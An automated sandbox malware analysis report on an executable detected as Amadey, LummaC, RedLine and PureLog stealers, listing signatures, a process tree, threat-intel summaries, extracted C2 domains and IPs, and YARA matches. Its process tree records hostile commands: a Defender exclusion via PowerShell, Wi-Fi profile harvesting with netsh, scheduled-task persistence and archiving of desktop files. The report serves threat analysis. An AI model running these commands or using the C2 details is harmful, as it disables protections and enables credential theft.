Edit tour

Windows Analysis Report
bUWKfj04aU.exe

Overview

General Information

Sample name:	bUWKfj04aU.exe renamed because original name is a hash value
Original sample name:	b9a582f60e89571526c4a6dacbb6a576.exe
Analysis ID:	1425954
MD5:	b9a582f60e89571526c4a6dacbb6a576
SHA1:	0fe5061a1a4aa43d2ba13e954813746cef08292a
SHA256:	a02549a343b100949c013f1c84927136e8c8f6e23110ae1d025c9733d5ad712f
Tags:	exe
Infos:

Detection

LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

System process connects to network (likely due to code injection or exploit)

Yara detected Amadey

Yara detected Amadeys Clipper DLL

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected UAC Bypass using CMSTP

.NET source code contains very large array initializations

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Creates HTML files with .exe extension (expired dropper behavior)

Creates an undocumented autostart registry key

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Installs new ROOT certificates

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Potentially malicious time measurement code found

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Reads the System eventlog

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Instant Messenger accounts or passwords

Uses netsh to modify the Windows network and firewall settings

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops certificate files (DER)

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

bUWKfj04aU.exe (PID: 6248 cmdline: "C:\Users\user\Desktop\bUWKfj04aU.exe" MD5: B9A582F60E89571526C4A6DACBB6A576)

explorgu.exe (PID: 1468 cmdline: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe MD5: B9A582F60E89571526C4A6DACBB6A576)

rundll32.exe (PID: 2988 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 6424 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)

netsh.exe (PID: 6656 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

conhost.exe (PID: 1612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4904 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

alexxxxxxxx.exe (PID: 3472 cmdline: "C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe" MD5: 85A15F080B09ACACE350AB30460C8996)

conhost.exe (PID: 3300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7144 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

propro.exe (PID: 1836 cmdline: "C:\Users\user\AppData\Roaming\configurationValue\propro.exe" MD5: CC90E3326D7B20A33F8037B9AAB238E4)

Traffic.exe (PID: 5768 cmdline: "C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe" MD5: 1FC4B9014855E9238A361046CFBF6D66)

conhost.exe (PID: 992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rundll32.exe (PID: 2820 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)

gold.exe (PID: 6508 cmdline: "C:\Users\user\AppData\Local\Temp\1001053001\gold.exe" MD5: 818B475B766C54DF6D845CB10B6EEDCF)

RegAsm.exe (PID: 3660 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 1424 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

NewB.exe (PID: 1776 cmdline: "C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe" MD5: 0099A99F5FFB3C3AE78AF0084136FAB3)

schtasks.exe (PID: 5564 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 7216 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5564 -ip 5564 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7976 cmdline: C:\Windows\system32\WerFault.exe -pss -s 500 -p 7684 -ip 7684 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

4767d2e713f2021e8fe856e3ea638b58.exe (PID: 7320 cmdline: "C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe" MD5: BABAF4A8115EFF2FF0233CBB89D043CC)

ISetup8.exe (PID: 7408 cmdline: "C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe" MD5: 49D2FD7E0A591B6AE99D11E5EDAAECF2)

FirstZ.exe (PID: 7496 cmdline: "C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe" MD5: FFADA57F998ED6A72B6BA2F072D2690A)

powershell.exe (PID: 7780 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Uni400uni.exe (PID: 7684 cmdline: "C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe" MD5: 81F2E982687C695EE0BBADF147FECA3B)

conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7912 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 7944 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WerFault.exe (PID: 8036 cmdline: C:\Windows\system32\WerFault.exe -u -p 7684 -s 1076 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

swiiiii.exe (PID: 5564 cmdline: "C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe" MD5: 1C7D0F34BB1D85B5D2C01367CC8F62EF)

conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 4976 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 7240 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5564 -s 920 MD5: C31336C1EFC2CCB44B4326EA793040F2)

explorgu.exe (PID: 7392 cmdline: "C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe" MD5: B9A582F60E89571526C4A6DACBB6A576)

random.exe (PID: 7488 cmdline: "C:\Users\user\AppData\Local\Temp\1001084001\random.exe" MD5: DA6F6F980F895340769B6811440D7D23)

file300un.exe (PID: 7672 cmdline: "C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe" MD5: 3170AED3EB44BD638CCE6F67650D4B50)

conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 8008 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

MSBuild.exe (PID: 8088 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

jok.exe (PID: 7964 cmdline: "C:\Users\user\AppData\Local\Temp\1001107001\jok.exe" MD5: 8510BCF5BC264C70180ABE78298E4D5B)

svchost.exe (PID: 5920 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

NewB.exe (PID: 5448 cmdline: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe MD5: 0099A99F5FFB3C3AE78AF0084136FAB3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: LummaC

{"C2 url": ["wifeplasterbakewis.shop", "mealplayerpreceodsju.shop", "bordersoarmanusjuw.shop", "suitcaseacanehalk.shop", "absentconvicsjawun.shop", "pushjellysingeywus.shop", "economicscreateojsu.shop", "entitlementappwo.shop"], "Build id": "LOGS11--LiveTraffic"}

Threatname: Amadey

{"C2 url": "185.172.128.19/ghsdh39s/index.php", "Version": "4.12"}

Threatname: RedLine

{"C2 url": "185.172.128.33:8970", "Bot Id": "@OLEH_PSP", "Authorization Header": "5fbb2db54ba05b2223e91d7545647809"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\NewB[1].exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\alexxxxxxxx[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\u5ps.1.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\cred64[1].dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\clip64[1].dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\clip64[1].dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Roaming\configurationValue\propro.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\jok[1].exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 10 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000017.00000000.2303988986.0000000000191000.00000020.00000001.01000000.00000016.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002F.00000000.2550237363.00000000006A1000.00000002.00000001.01000000.00000021.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000023.00000003.3016446842.0000000005841000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
0000001A.00000000.2335483499.0000000000191000.00000020.00000001.01000000.00000016.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000003.2112311636.0000000005090000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000000.2242693260.0000000000A22000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000F.00000000.2242861766.0000000000342000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000015.00000002.2567701880.00000000012B1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
00000027.00000002.3456932485.0000027AB9251000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000A.00000002.2271671273.0000000003B05000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000002.2271671273.0000000003B73000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000A.00000002.2271671273.0000000003B73000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x3f1a3:$a1: get_encrypted_key 0x1169e5:$a1: get_encrypted_key 0x1160e7:$a2: get_PassedPaths 0x3b28a:$a3: ChromeGetLocalName 0x114b08:$a3: ChromeGetLocalName 0x3e1f8:$a4: GetBrowsers 0x1162e8:$a4: GetBrowsers 0x49552:$a5: Software\Valve\SteamLogin Data 0x11cd12:$a5: Software\Valve\SteamLogin Data 0x47d52:$a6: %appdata%\ 0x11c5b2:$a6: %appdata%\ 0x115e0c:$a7: ScanPasswords
0000000A.00000000.2217700639.00000000005F2000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000003.2150646728.0000000004C30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000F.00000002.2371502958.00000000125F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: powershell.exe PID: 4904	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: alexxxxxxxx.exe PID: 3472	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: propro.exe PID: 1836	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 1424	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 1424	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 4976	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 4976	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: file300un.exe PID: 7672	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: file300un.exe PID: 7672	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: Uni400uni.exe PID: 7684	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.alexxxxxxxx.exe.3c762de.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.alexxxxxxxx.exe.3c762de.2.raw.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x13707:$a1: get_encrypted_key 0x12e09:$a2: get_PassedPaths 0x1182a:$a3: ChromeGetLocalName 0x1300a:$a4: GetBrowsers 0x19a34:$a5: Software\Valve\SteamLogin Data 0x192d4:$a6: %appdata%\ 0x12b2e:$a7: ScanPasswords
10.2.alexxxxxxxx.exe.3c762de.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x19ca4:$pat14: , CommandLine: 0x12cda:$v2_1: ListOfProcesses 0x12a9a:$v4_3: base64str 0x136d5:$v4_4: stringKey 0x1123f:$v4_5: BytesToStringConverted 0x1033a:$v4_6: FromBase64 0x117b2:$v4_8: procName 0x11ac8:$v5_1: DownloadAndExecuteUpdate 0x12971:$v5_2: ITaskProcessor 0x11ab6:$v5_3: CommandLineUpdate 0x11aa7:$v5_4: DownloadUpdate 0x11ead:$v5_5: FileScanning 0x11460:$v5_7: RecordHeaderField 0x110c8:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
39.2.file300un.exe.27ab92961f8.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.alexxxxxxxx.exe.3b05570.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
15.0.Traffic.exe.340000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
15.2.Traffic.exe.125f1a78.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.alexxxxxxxx.exe.3b07541.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
47.0.jok.exe.680000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.alexxxxxxxx.exe.3c762de.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.alexxxxxxxx.exe.3c762de.2.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x11b07:$a1: get_encrypted_key 0x11209:$a2: get_PassedPaths 0xfc2a:$a3: ChromeGetLocalName 0x1140a:$a4: GetBrowsers 0x17e34:$a5: Software\Valve\SteamLogin Data 0x176d4:$a6: %appdata%\ 0x10f2e:$a7: ScanPasswords
10.2.alexxxxxxxx.exe.3c762de.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x180a4:$pat14: , CommandLine: 0x110da:$v2_1: ListOfProcesses 0x10e9a:$v4_3: base64str 0x11ad5:$v4_4: stringKey 0xf63f:$v4_5: BytesToStringConverted 0xe73a:$v4_6: FromBase64 0xfbb2:$v4_8: procName 0xfec8:$v5_1: DownloadAndExecuteUpdate 0x10d71:$v5_2: ITaskProcessor 0xfeb6:$v5_3: CommandLineUpdate 0xfea7:$v5_4: DownloadUpdate 0x102ad:$v5_5: FileScanning 0xf860:$v5_7: RecordHeaderField 0xf4c8:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
14.0.propro.exe.a20000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
26.2.NewB.exe.190000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
23.0.NewB.exe.190000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
40.2.Uni400uni.exe.25500086af8.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
26.0.NewB.exe.190000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
10.2.alexxxxxxxx.exe.3b8e946.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.alexxxxxxxx.exe.3b07541.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
40.2.Uni400uni.exe.255000840b8.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
39.2.file300un.exe.27ab92937b8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.alexxxxxxxx.exe.3b8e946.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.alexxxxxxxx.exe.3b8e946.0.raw.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x2385d:$a1: get_encrypted_key 0xfb09f:$a1: get_encrypted_key 0xfa7a1:$a2: get_PassedPaths 0x1f944:$a3: ChromeGetLocalName 0xf91c2:$a3: ChromeGetLocalName 0x228b2:$a4: GetBrowsers 0xfa9a2:$a4: GetBrowsers 0x2dc0c:$a5: Software\Valve\SteamLogin Data 0x1013cc:$a5: Software\Valve\SteamLogin Data 0x2c40c:$a6: %appdata%\ 0x100c6c:$a6: %appdata%\ 0xfa4c6:$a7: ScanPasswords
10.2.alexxxxxxxx.exe.3b8e946.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x2ec24:$pat14: , CommandLine: 0x10163c:$pat14: , CommandLine: 0xfa672:$v2_1: ListOfProcesses 0x21fd4:$v4_3: base64str 0xfa432:$v4_3: base64str 0x237fe:$v4_4: stringKey 0xfb06d:$v4_4: stringKey 0x1eeb4:$v4_5: BytesToStringConverted 0xf8bd7:$v4_5: BytesToStringConverted 0x1d0fe:$v4_6: FromBase64 0xf7cd2:$v4_6: FromBase64 0xf914a:$v4_8: procName 0x1fdf7:$v5_1: DownloadAndExecuteUpdate 0xf9460:$v5_1: DownloadAndExecuteUpdate 0xfa309:$v5_2: ITaskProcessor 0xf944e:$v5_3: CommandLineUpdate 0x1fde8:$v5_4: DownloadUpdate 0xf943f:$v5_4: DownloadUpdate 0x2071f:$v5_5: FileScanning 0xf9845:$v5_5: FileScanning 0x1f28f:$v5_7: RecordHeaderField
10.0.alexxxxxxxx.exe.5f0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.bUWKfj04aU.exe.8c0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
